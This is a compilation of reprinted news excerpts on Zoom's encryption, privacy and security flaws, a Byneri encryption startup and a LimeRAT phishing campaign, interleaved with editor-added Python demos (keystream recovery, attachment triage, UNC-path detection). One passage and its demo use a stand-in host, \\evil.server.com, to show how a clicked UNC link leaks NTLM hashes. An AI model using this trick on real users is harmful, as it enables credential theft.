The newly uncovered flaws in Zoom's encryption may be troubling for many of the company's customers. Since the coronavirus outbreak started, Zoom's customer base has surged from 10 million users to 200 million, including over 90,000 schools across 20 countries, according to a blog post by Zoom CEO Eric Yuan. The U.S. government recently spent $1.3 million on Zoom contracts as part of its response to the pandemic, according to a review of government contracts by Forbes, and the U.K. government has been using Zoom for remote Cabinet meetings, according to a tweet from Prime Minister Boris Johnson.

Among those who should be concerned about Zooms security issues, according to Citizen Lab, are governments worried about espionage and businesses concerned about cybercrime and industrial espionage.

Despite a recent flood of security and privacy failures, Yuan, Zoom's CEO, appears to be listening to feedback and making a real effort to improve the service. "These new, mostly consumer use cases have helped us uncover unforeseen issues with our platform. Dedicated journalists and security researchers have also helped to identify pre-existing ones," Yuan wrote in his blog post. "We appreciate the scrutiny and questions we have been getting about how the service works, about our infrastructure and capacity, and about our privacy and security policies."

In addition to promptly fixing several security issues that were reported, the company removed an "attendee attention tracker" feature, a privacy nightmare that let meeting hosts track whether participants had the Zoom window or some other app's window in focus during a meeting. It has also invested in new training materials to teach users about security features like setting passwords on meetings to avoid "Zoom-bombing", the phenomenon where people disrupt unprotected Zoom meetings.

Because Zoom's service is not end-to-end encrypted, and the company has access to all encryption keys and to all video and audio content traversing its cloud, it's possible that governments around the world could be compelling the company to hand over copies of this data. If Zoom does help governments spy on its users, the company claims that it hasn't built tools specifically to help law enforcement: "Zoom has never built a mechanism to decrypt live meetings for lawful intercept purposes," Gal, Zoom's chief product officer, wrote in the technical blog post, "nor do we have means to insert our employees or others into meetings without being reflected in the participant list."

Unlike some other tech companies, Zoom has never released any information about how many government requests for data it gets, and how many of those requests it complies with. But after the human rights group Access Now's open letter urging Zoom to publish a transparency report, Yuan promised to do just that. Within the next three months, the company will prepare "a transparency report that details information related to requests for data, records, or content." Access Now has commended Zoom on committing to publish a transparency report.

Read this article:
Zoom's Flawed Encryption Linked to China - The Intercept

This startup is going back to basics to strengthen encryption – Livemint

A hack is no longer just about exposing a bank account or somebody's photos. There can be far scarier fallouts. Satellite systems can be hacked to spoof GPS signals, for example, and send drones to the wrong destination or hijack oil tankers.

Time was when randomly generated binary number sequences were good enough for symmetric encryption of streaming data. "But in today's world of grid and cloud computing, those can be cracked easily," says Jay Hotti, co-founder and CEO of cybersecurity startup Byneri, based in Bengaluru and Singapore.

Encryption tries to stay one up on hackers by adding algorithmic layers of security on top of the binary sequences. The Data Encryption Standard (DES) was adopted in 1977 and superseded by the Advanced Encryption Standard (AES) in 2001. RC4 was a secret cipher until it got leaked.

"Another algorithm is Blowfish, which has been superseded by Twofish. They use different mechanisms to add security, but each introduces new challenges and vulnerabilities," explains Hotti. "The more steps you introduce in any encryption, the more potential weaknesses you expose. And you never know what you don't know until somebody hits that, which happens now and then."

Layers of complexity

Byneri goes to a more fundamental level, strengthening the underlying binary sequences. The mathematics to generate such sequences was developed in the late 1960s and early 1970s by the US Defense Advanced Research Projects Agency (DARPA). Later, when the internet took off at the turn of the millennium, asymmetric encryption came into wide use, using prime numbers: a public key is used to encrypt a message and a private key to decrypt it.

Asymmetric encryption is mainly used for identification, authentication and key exchange. But most online systems, such as payments, still depend on symmetric encryption, where one key is used for both encryption and decryption. That's because asymmetric encryption would become unwieldy with large amounts of data.

This brings us to Byneri's innovation, which goes to the roots of symmetric encryption. "We can generate binary sequences whose linear complexity is many orders of magnitude more than the existing ones. And we're able to do this very fast," says Hotti.

The linear complexity determines the strength of an encryption key," adds angel investor P.G. Ponnapa, who is working with Byneri. A 1024-bit key can be cracked with 10 to the power of six permutations. The Byneri way raises that to 10 to the power of 154 permutations."
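
The "linear complexity" Ponnapa is referring to has a precise meaning: the length L of the shortest linear feedback shift register (LFSR) that reproduces a bit sequence, computed by the Berlekamp-Massey algorithm. What makes it matter for a stream cipher is that 2L known keystream bits are enough to recover that LFSR and predict every later bit. The following added example is the editor's, not Byneri's code or method; the LFSR, its taps and the seed are constructed for the demo.

```python
"""Added example (the editor's own, not Byneri's method): what 'linear complexity' means and
why a keystream with a low value is breakable. All sequences below are constructed for the demo."""
import os


def lfsr_bits(taps, seed, n):
    """Fibonacci LFSR. `state` holds the next len(seed) output bits, oldest first; `taps`
    are state positions XORed to form the feedback bit. taps=(0, 2) with a 5-bit state
    realises s[i+5] = s[i] ^ s[i+2], i.e. the primitive polynomial x^5 + x^2 + 1 (period 31)."""
    state, out = list(seed), []
    for _ in range(n):
        out.append(state[0])
        fb = 0
        for t in taps:
            fb ^= state[t]
        state = state[1:] + [fb]
    return out


def linear_complexity(bits):
    """Berlekamp-Massey over GF(2). Returns (L, c): L is the length of the shortest LFSR
    generating `bits`, and c[1..L] are its feedback coefficients, so that
    bits[i] == XOR over j=1..L of (c[j] & bits[i-j]) for every i >= L."""
    n = len(bits)
    c = [1] + [0] * n          # current connection polynomial C(x)
    b = [1] + [0] * n          # copy of C(x) from the last time L changed
    L, m = 0, -1
    for i in range(n):
        d = bits[i]                           # discrepancy: does C(x) predict bit i?
        for j in range(1, L + 1):
            d ^= c[j] & bits[i - j]
        if d:
            t = c[:]
            shift = i - m
            for j in range(n + 1 - shift):
                c[j + shift] ^= b[j]          # C(x) += x^(i-m) * B(x)
            if 2 * L <= i:
                L, m, b = i + 1 - L, i, t
    return L, c[:L + 1]


def predict(bits, c, L, count):
    """Extend `bits` by `count` positions using the recovered recurrence."""
    s = list(bits)
    for _ in range(count):
        nxt = 0
        for j in range(1, L + 1):
            nxt ^= c[j] & s[-j]
        s.append(nxt)
    return s[len(bits):]


def attack_keystream(keystream, known):
    """Treat the first `known` bits as leaked keystream (e.g. recovered from a known-plaintext
    prefix), rebuild the generator, and predict the rest. Returns (L, prediction_was_exact)."""
    L, c = linear_complexity(keystream[:known])
    guess = predict(keystream[:known], c, L, len(keystream) - known)
    return L, guess == keystream[known:]


if __name__ == "__main__":
    stream = lfsr_bits((0, 2), [1, 0, 1, 1, 0], 200)     # constructed keystream, period 31
    L, ok = attack_keystream(stream, 40)
    print(f"LFSR keystream: linear complexity {L}; next 160 bits predicted exactly: {ok}")
    rnd = [bit for byte in os.urandom(25) for bit in map(int, f"{byte:08b}")]
    print("200 random bits: linear complexity", linear_complexity(rnd)[0], "(about n/2 is expected)")
```

For n bits from a good generator the algorithm returns roughly n/2, which is why the random sample scores near 100, while the 200-bit LFSR stream scores 5 and 40 leaked bits are enough to reproduce the remaining 160 exactly. High linear complexity is necessary for a keystream but nowhere near sufficient; a nonlinear filter over a short LFSR can have high linear complexity and still fall to correlation or algebraic attacks, so this single measure should not be read as a strength figure on its own.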

One of its early testers is a company making receivers for low earth orbit (LEO) satellites, typically used for applications involving GPS. The overcrowding in space means these receivers have to distinguish between the many satellites in their view. To do this, they needed a large number of binary sequences which couldnt have been done with their existing system," says Hotti.

Going to market with such a highly technical black box product is a challenge. Ponnapa experienced this himself when he first heard the idea of Byneri. I have known Jay 35 years. We were in college together (NIT Surathkal). When he told me he had cracked this, I met him for dinner. Two hours later, I had understood nothing," says Ponnapa with a smile. He met Hotti again the next day with more specific questions, and the penny dropped.

Hotti's involvement with cryptography goes back to his work with payment systems. He worked on Thailand's national payment system and implemented India's first payment network, Swadhan, for the Indian Banks' Association in the nineties. "That was the basis of how shared ATM networks started in India," says Hotti, who was also CTO of Singapore's payment gateway and merchant payment network NETS.

Multiple uses

Hotti's co-founder is Professor Mahalinga V Mandi of the Ambedkar Institute of Technology in Bengaluru, who was researching the application of binary sequences in satellite communication and navigation. He was initially sceptical when Hotti suggested it could also be applied in banking and other industries. "I kept pestering him and we ended up making a matrix of implementations in 14 industry types."

It took them two-and-a-half years to develop the product and test it. Then we went to a space company last year. They tried it on heterogeneous systems and it worked. Thats when we decided to raise some money. Until then it was funded by our own money."

Byneri has also been talking to a tech company that provides solutions to space companies. The order confirmation came last month, just before the country went into a lockdown.

Sumit Chakraberty is a Consulting Editor with Mint. Write to him at chakraberty@gmail.com

See the rest here:
This startup is going back to basics to strengthen encryption - Livemint

Zoom’s encryption has ‘serious, well-known weaknesses’, according to report – Android Central

Two separate reports have revealed further issues within popular video-conferencing app Zoom.

First up, a report from The Verge notes that a security professional has used an automated tool that can scour Zoom for meetings that are not protected by passwords. Apparently, it was able to find 2,400 calls in a single day, extracting a link to the meeting, date, time, organizer and meeting topic information. From the report:

Security professional Trent Lo and members of SecKC, a Kansas City-based security meetup group, made a program called zWarDial that can automatically guess Zoom meeting IDs, which are nine to 11 digits long, and glean information about those meetings, according to the report.

In addition to being able to find around 100 meetings per hour, one instance of zWarDial can successfully determine a legitimate meeting ID 14 percent of the time, Lo told Krebs on Security. And as part of the nearly 2,400 upcoming or recurring Zoom meetings zWarDial found in a single day of scanning, the program extracted a meeting's Zoom link, date and time, meeting organizer, and meeting topic, according to data Lo shared with Krebs on Security.

In a statement to The Verge regarding this issue Zoom said:

"Zoom strongly encourages users to implement passwords for all of their meetings to ensure uninvited users are not able to join... Passwords for new meetings have been enabled by default since late last year, unless account owners or admins opted out. We are looking into unique edge cases to determine whether, under certain circumstances, users unaffiliated with an account owner or administrator may not have had passwords switched on by default at the time that change was made."

A second separate report from The Intercept published today claims that Zoom's encryption algorithm has "serious, well-known weaknesses" and that keys are being issued by servers sometimes based in China, even if all the participants are based in the US.

"MEETINGS ON ZOOM, the increasingly popular video conferencing service, are encrypted using an algorithm with serious, well-known weaknesses, and sometimes using keys issued by servers in China, even when meeting participants are all in North America, according to researchers at the University of Toronto.

The researchers also found that Zoom protects video and audio content using a home-grown encryption scheme, that there is a vulnerability in Zoom's "waiting room" feature, and that Zoom appears to have at least 700 employees in China spread across three subsidiaries. They conclude, in a report for the university's Citizen Lab (widely followed in information security circles), that Zoom's service is "not suited for secrets" and that it may be legally obligated to disclose encryption keys to Chinese authorities and "responsive to pressure" from them."

Zoom has not commented further on this issue, which was also reported by Forbes who note:

"...in an interview published on Forbes on Friday, Chief Executive Eric Yuan said the company was going to check on how it was routing conversations to China, but emphasized the data was protected. As Citizen Lab hadn't sent its findings to Zoom, saying it was in the public interest to release the information as soon as possible, the videoconferencing company wouldn't have been aware of the findings. But Yuan assured that if user data was being transferred to China when users weren't even based there, "we are willing to address that."

Security concerns regarding Zoom are now seemingly well noted in the community. The encouraging sign is that Zoom has taken notice, apologized and vowed to fix all of these issues over the next 90 days, freezing new features in the meantime.

Go here to read the rest:
Zoom's encryption has 'serious, well-known weaknesses', according to report - Android Central

LimeRAT malware is being spread through VelvetSweatshop Excel encryption technique – ZDNet

A new campaign is spreading the LimeRAT Remote Access Trojan by harnessing an old encryption technique in Excel files.

LimeRAT is a simple Trojan designed for Windows machines. The malware is able to install backdoors on infected machines and encrypt files in the same way as typical ransomware strains, add PCs to botnets, and install cryptocurrency miners.

In addition, the modular Trojan can spread through connected USB drives, uninstall itself if a virtual machine (VM) is detected -- a typical practice for security researchers attempting to reverse-engineer malware -- lock screens, and steal a variety of data, which is then sent to a command-and-control (C2) server over an AES-encrypted channel.

In a new campaign observed by Mimecast, the Trojan is being hidden as a payload in read-only Excel documents spread via phishing emails. Researchers said in a blog post on Tuesday that the Excel documents are saved as read-only -- rather than locked with a password the recipient must know -- which encrypts the file without making the user type in a password when it is opened.

To decrypt the file on open, Excel will first try an embedded default password, "VelvetSweatshop," which Microsoft programmers hardcoded years ago. If that succeeds, the file is decrypted silently, the onboard macros and the malicious payload can launch, and the document stays read-only.

Usually, if decryption through VelvetSweatshop fails, then users are required to submit a password. However, read-only mode bypasses this step, thereby reducing the steps required to compromise a Windows machine.

"The advantage of the read-only mode for Excel to the attacker is that it requires no user input, and the Microsoft Office system will not generate any warning dialogs other than noting the file is read-only," the researchers say.
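
An added example of how a mail gateway could triage attachments for this trick (the editor's code, not Mimecast's or Microsoft's). It relies on two facts about the formats: an ordinary .xlsx is a ZIP archive, while a password-protected one is rewritten as an OLE2/CFB container whose directory holds EncryptionInfo and EncryptedPackage streams, with the names stored in UTF-16LE. A file with an OOXML extension that arrives as a CFB container carrying those stream names is encrypted, and that is exactly the case in which Excel will silently try "VelvetSweatshop". The sample bytes are constructed stand-ins, not real workbooks; the optional decryption check assumes the msoffcrypto-tool library and its OfficeFile/load_key/decrypt API.

```python
"""Added example (the editor's own, not Mimecast's detector): cheap triage for attachments
that use the VelvetSweatshop default-password trick. Sample bytes are constructed."""
import io

ZIP_MAGIC = b"PK\x03\x04"                                   # OOXML (.xlsx/.docx) is a ZIP archive
CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"             # OLE2 / Compound File Binary header
# A password-protected OOXML file is repacked as CFB with these streams; directory entry
# names are stored as UTF-16LE, so the raw bytes can be searched for them directly.
ENC_STREAMS = [s.encode("utf-16-le") for s in ("EncryptionInfo", "EncryptedPackage")]
OOXML_EXT = (".xlsx", ".xlsm", ".docx", ".docm", ".pptx", ".pptm")
DEFAULT_PASSWORD = "VelvetSweatshop"                        # the password Excel tries silently on open


def classify_office_attachment(name, data):
    """Return a verdict string for an attachment's filename and raw bytes."""
    ext = name.lower()[name.rfind("."):] if "." in name else ""
    if data.startswith(ZIP_MAGIC):
        return "ooxml-plain"                  # ordinary, unencrypted OOXML
    if not data.startswith(CFB_MAGIC):
        return "not-office"
    if any(marker in data for marker in ENC_STREAMS):
        return "ooxml-encrypted"              # Office will try DEFAULT_PASSWORD first on this
    if ext in OOXML_EXT:
        return "ooxml-ext-but-cfb"            # claims to be OOXML but is a legacy/odd container
    return "legacy-binary"                    # .xls/.doc style binary file


def should_block(name, data):
    """Demo policy: hold encrypted OOXML and extension/container mismatches for review."""
    return classify_office_attachment(name, data) in ("ooxml-encrypted", "ooxml-ext-but-cfb")


def try_default_password(path):
    """Confirm the trick: does the file open with the default password? Uses msoffcrypto-tool
    if installed (assumed API: OfficeFile, load_key(password=...), decrypt(outfile)); returns
    None when the library is absent, True/False otherwise."""
    try:
        import msoffcrypto
    except ImportError:
        return None
    with open(path, "rb") as f:
        office = msoffcrypto.OfficeFile(f)
        try:
            office.load_key(password=DEFAULT_PASSWORD)
            office.decrypt(io.BytesIO())
            return True
        except Exception:
            return False


def _fake_cfb(with_encryption_streams):
    """Constructed stand-in for a CFB container: real 8-byte signature, zero-filled header
    sector, and optionally the UTF-16LE stream names a real encrypted file would carry."""
    body = CFB_MAGIC + bytes(504)
    if with_encryption_streams:
        body += b"".join(m + bytes(64 - len(m)) for m in ENC_STREAMS)
    return body + bytes(512)


if __name__ == "__main__":
    samples = {                                   # all constructed
        "report.xlsx": ZIP_MAGIC + bytes(64),
        "invoice.xlsx": _fake_cfb(True),
        "old.xls": _fake_cfb(False),
        "renamed.xlsx": _fake_cfb(False),
        "notes.txt": b"just text",
    }
    for n, d in samples.items():
        print(f"{n:14s} {classify_office_attachment(n, d):20s} block={should_block(n, d)}")
```

The check is deliberately cheap (magic bytes plus a substring scan) so it can run inline on every attachment; a sandbox or the msoffcrypto-tool step can then confirm whether the default password actually opens the file, which is what separates this campaign from a document a sender legitimately protected with a password they shared out of band.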

The new campaign designed to spread LimeRAT makes use of this technique, which was first spotted back in 2013 and presented at a Virus Bulletin conference. The encrypted spreadsheet carries an exploit for CVE-2012-0158, an old Office vulnerability; the hardcoded password is what lets the file open, and the exploit fire, without any user interaction.

It is worth noting this issue was addressed a long time ago; however, Sophos notes (PDF) that the vulnerability has continued to be exploited over the years, in a case it deemed "remarkable."

Mimecast says the cyberattackers also use a "blend of other techniques in an attempt to fool anti-malware systems by encrypting the content of the spreadsheet hence hiding the exploit and payload."

Microsoft has been made aware that the vulnerability is once again in use.

The rest is here:
LimeRAT malware is being spread through VelvetSweatshop Excel encryption technique - ZDNet

Zoom’s end-to-end encryption isn’t actually end-to-end at all. Good thing the PM isn’t using it for Cabinet calls. Oh, for f… – The Register

UK Prime Minister Boris Johnson sparked security concerns on Tuesday when he shared a screenshot of the first ever digital Cabinet on his Twitter feed. It revealed the country's most senior officials and ministers were using bog-standard Zoom to discuss critical issues facing Blighty.

The tweet also disclosed the Zoom meeting ID was 539-544-323, and fortunately that appears to have been password protected. That's a good thing because miscreants hijacking unprotected Zoom calls is a thing.

Crucially, the use of the Zoom software is likely to have infuriated the security services, while also raising questions about whether the UK government has its own secure video-conferencing facilities. We asked GCHQ, and it told us that it was a Number 10 issue. Downing Street declined to comment.

The decision to use Zoom, as millions of others stuck at home during the coronavirus outbreak are doing, comes as concerns are growing about the conferencing app's business model and security practices.

Most notably, the company has been forced to admit that although it explicitly gives users the option to hold an end-to-end encrypted conversation and touts end-to-end encryption as a key feature of its service, in fact it offers no such thing.

Specifically, it uses TLS, which underpins HTTPS website connections and is significantly better than nothing. But it most definitely is not end-to-end encryption (E2E). E2E ensures all communications are encrypted between the participants' devices so that not even the organization hosting the service has access to the contents of the connection. With TLS terminating on its servers, Zoom can intercept and decrypt video chats and other data.

Despite Zoom offering a meeting host the option to enable an end-to-end (E2E) encrypted meeting, and providing a green padlock that claims Zoom is using an end to end encrypted connection, it appears that the company is able to access data in transit along that connection, and can also be compelled to provide it to governments. So, it's not E2E.

While that is not something that will bother most Zoom users, whose conversations are not highly sensitive nor confidential, for something like a UK Cabinet meeting, the lack of true end-to-end encryption is dangerous.

Under questioning, a Zoom spokesperson admitted: Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.

Then they gave their own Zoom version of what the phrase end-to-end encryption actually means: When we use the phrase End to End in our other literature, it is in reference to the connection being encrypted from Zoom end point to Zoom end point, a spokesperson told The Intercept on Tuesday.

The use of end point in this context refers to Zoom servers, not just Zoom clients; a second layer of purposefully misleading semantics.

Thats not the only area where Zoom has been found wanting. As a spotlight has swung on the biz thanks to its enormous take-up in recent weeks, its dodgy data sharing policies were also revealed.

As we reported earlier this month, Zoom granted itself the right to mine your personal data and conference calls to target you with ads, and seemed to have a "creepily chummy" relationship with tracking-based advertisers.

Personal information gathered by the company included, but was not limited to, names, addresses and any other identifying data, job titles and employers, Facebook profiles, and device specifications. It also included "the content contained in cloud recordings, and instant messages, files, whiteboards ... shared while using the service."

In other words, it was, arguably, the Facebook of the video-conferencing world, sucking every piece of data it can from you and any device you install it on.

Speaking of Facebook, Zoom's iOS app sent analytics data to Facebook even if you didn't use Facebook to sign into Zoom, due to the application's use of the social network's Graph API, Vice discovered. The privacy policy stated the software collects profile information when a Facebook account is used to sign into Zoom, though it didn't say anything about what happens if you don't use Facebook. Zoom has since corrected its code to not send analytics to the social network if you don't use it to sign into the video-conferencing app.

Zoom also stupidly glommed users together, as if they were working for the same company, because they used a common email provider, such as xs4all.nl.

Privacy advocacy group Access Now, meanwhile, dug into Zoom's privacy policy and practices and didn't like what it saw, sending a letter to the company on March 19 asking it to publish a transparency report along the same lines as other companies, making it plain exactly what the company was doing with its users' data.

The growing demand for Zooms services makes it a target for third parties, from law enforcement to malicious hackers, seeking personal data and sensitive information, said Access Nows general counsel Peter Micek. This is why just disclosing privacy policies is not enough its high time for Zoom to tell us how they protect our personal lives and professional activities from exploitation. This starts with a regular transparency report.

The Facebook API kerfuffle resulted in a lawsuit [PDF], filed on Monday in California. The plaintiff in this case, Robert Cullen of Sacramento, California, is looking to bring a class action against Zoom for failing to protect personal data.

He argued Zoom has violated three Californian laws: the Unfair Competition Law, Consumers Legal Remedies Act, and Consumer Privacy Act by collecting and providing personal information to third parties including Facebook.

Had Zoom informed its users that it would use inadequate security measures and permit unauthorized third-party tracking of their personal information, users would not have been willing to use the Zoom app, the lawsuit argued.

In short, while Zoom's ease of use, reliability and excellent user interface have made it a godsend for people stuck at home, the company continues to raise red flags about its honesty, its privacy policies and its business model. Something that a country's head of government would do well to consider before posting screengrabs of online meetings.

Stop press... Zoom has quietly rewritten its privacy policy since our earlier coverage to now stress: "We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data."

It continued: "Your meetings are yours. We do not monitor them or even store them after your meeting is done unless we are requested to record and store them by the meeting host ... We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites."

It, thus, appears to have clarified, among other things, that it, at least now, does not use the content of meetings and messages to generate targeted advertising.

PS: Zoom has an attention-tracking feature, which can be turned on by a meeting host, that alerts the host if you click away from the Zoom conference for more than 30 seconds.

PPS: It appears you can snaffle people's Windows login usernames and NTLM authentication hashes (crackable offline) via Zoom by getting them to click on a link in a chat message that points at a malicious SMB file server. A UNC path such as \\evil.server.com\foobar.jpg will, when clicked on, cause Windows to connect to evil.server.com over SMB, supplying the logged-in user's credentials in the hope of fetching foobar.jpg. Swap foobar.jpg for malware.exe and you could get code execution on the victim's computer.
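
The PPS describes a classic UNC path injection: on Windows, anything that tries to open \\host\share starts an SMB connection and an NTLM authentication attempt against that host. The fix on the chat-client side is simply not to make such strings clickable. The following added example (the editor's, not Zoom's code) puts a naive linkifier that creates the problem next to a hardened one that links only http(s) URLs and HTML-escapes everything else, plus a detector that flags UNC paths in chat text for alerting. The messages are constructed.

```python
r"""Added example (the editor's own, not Zoom's code): keep UNC paths inert in chat, and spot them.
A clicked \\host\share link makes Windows authenticate to `host` over SMB with NTLM."""
import html
import re

# \\host\component(\component...) : two leading backslashes, a hostname, at least one more part.
UNC_RE = re.compile(r"(?<![\w\\])\\\\[A-Za-z0-9._-]+(?:\\[^\s\\<>\"']+)+")
URL_RE = re.compile(r"https?://[^\s<>\"']+")


def find_unc_paths(text):
    """Every UNC path in a message; one arriving from an outside participant is worth an alert."""
    return UNC_RE.findall(text)


def naive_linkify(text):
    r"""What not to do: wrap anything URL- or path-shaped in an anchor, including \\host\share."""
    return re.sub(r"(https?://[^\s]+|\\\\[^\s]+)",
                  lambda m: f'<a href="{m.group(0)}">{m.group(0)}</a>', text)


def safe_linkify(text):
    """Hardened version: only http(s) URLs become anchors, everything else is escaped plain text."""
    out, pos = [], 0
    for m in URL_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        url = html.escape(m.group(0), quote=True)
        out.append(f'<a href="{url}" rel="noopener noreferrer">{url}</a>')
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


if __name__ == "__main__":
    messages = [                                               # constructed chat lines
        r"slides are at \\evil.server.com\foobar.jpg",
        "agenda: https://example.org/agenda?week=14",
        r"not C:\Users\me\notes.txt, the real path is \\files.corp.example\share\q1.xlsx",
    ]
    for msg in messages:
        print("UNC  :", find_unc_paths(msg))
        print("naive:", naive_linkify(msg))
        print("safe :", safe_linkify(msg))
```

On the endpoint side the same class of leak is blunted by blocking outbound TCP 445 at the perimeter and by the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers", which stops Windows from answering an NTLM challenge from an untrusted host in the first place; the detector above is for the chat service or its logs, where a UNC path from an unknown participant is a usable alert signal.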

Read more here:
Zoom's end-to-end encryption isn't actually end-to-end at all. Good thing the PM isn't using it for Cabinet calls. Oh, for f... - The Register